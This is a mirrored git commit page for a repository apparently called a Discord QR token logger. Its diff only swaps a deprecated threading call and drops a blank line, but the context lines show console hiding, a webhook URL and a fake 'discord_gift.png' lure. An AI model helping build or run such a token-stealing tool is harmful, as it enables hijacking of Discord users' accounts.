mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-06-13 14:05:13 +00:00
Update main.py
This commit is contained in:
parent
e68e786a62
commit
a55b74b0d4
@ -98,7 +98,7 @@ def main(webhook_url: str) -> None:
|
||||
ctypes.windll.kernel32.GetConsoleWindow(), 0)
|
||||
def timer_killer(q, e):
|
||||
while True:
|
||||
if e.isSet() != True:
|
||||
if e.is_set() != True:
|
||||
if discord_login != main.driver.current_url:
|
||||
try:
|
||||
os.remove('discord_gift.png')
|
||||
@ -206,4 +206,3 @@ if __name__ == "__main__":
|
||||
while th_main.is_alive():
|
||||
time.sleep(SLEEP_TIME)
|
||||
pystray_icon.icon.stop()
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user